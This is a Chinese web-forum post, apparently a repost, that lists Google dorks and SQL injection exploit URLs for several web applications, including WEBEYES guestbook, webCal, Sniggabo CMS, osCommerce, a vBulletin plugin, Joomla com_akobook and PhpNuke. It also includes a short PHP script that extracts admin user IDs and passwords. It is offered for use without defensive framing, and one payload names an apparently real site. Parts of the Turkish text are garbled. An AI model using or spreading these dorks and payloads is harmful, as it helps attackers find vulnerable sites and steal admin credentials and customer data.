设为首页收藏本站

 找回密码
 注册
搜索
热搜: 回贴
微赢网络技术论坛 门户 站长交流 站长知道 查看内容

关于一些注入

2010-1-31 08:01| 发布者: admin| 查看: 135| 评论: 0|原作者: 回梦游仙

Asp

Google Dork : intitle:WEBEYES GUEST BOOK inurl:.asp?id=
Remote sql injection Exploit :

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects



Google Dork : inurl:/webCal3_detail.asp?event_id=
Remote sql injection Exploit :

http://[website]/[script]/webCal3_detail.asp?event_id=20814+union+select+1,2,3,4,5,6,7,8,9,10+from+msysobjects

_________________________________________________________________________________________________________
PHP

Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id

$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
$src = file_get_contents($url);
$data = split("::",$src);
echo "Admin: $data[1]\nPassword: $data[2]\n";
?>

__________________________________________________________________________________________________________

OsCommerce

Dork: inurl:"customer_testimonials.php"
http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
___________________________________________________________________________________________________________

vBulletin

DORK: inurl:"vbplaza.php?do=*"
http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58
____________________________________________________________________________________________________________
Joomla

Dork : inurl:index.php?option=com_akobook
Exploit : http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birli?i%20+%20+1,2,3,4,5,6,7,8,9%20se?in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*

_____________________________________________________________________________________________________________

MyBB i?in T?kla
_____________________________________________________________________________________________________________

PhpNuke

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1


收藏 分享 邀请

最新评论

相关分类

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-9-29 23:24 , Processed in 0.141391 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

返回顶部